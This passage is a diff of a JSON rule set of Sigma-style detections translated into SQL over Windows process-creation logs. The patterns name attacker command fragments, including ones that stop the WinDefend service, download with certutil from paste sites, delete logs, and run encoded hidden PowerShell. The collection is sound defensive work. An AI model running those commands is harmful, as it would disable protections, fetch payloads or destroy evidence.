Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine 
LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' 
ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE 
'\\' OR NewProcessName LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects Netsh command execution that whitelists a program 
located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE 
'\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. 
Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" - }, - { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects the use of the Dinject PowerShell cradle based on 
the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": 
"Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "status": "test", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine 
LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs 
WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": 
"proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * 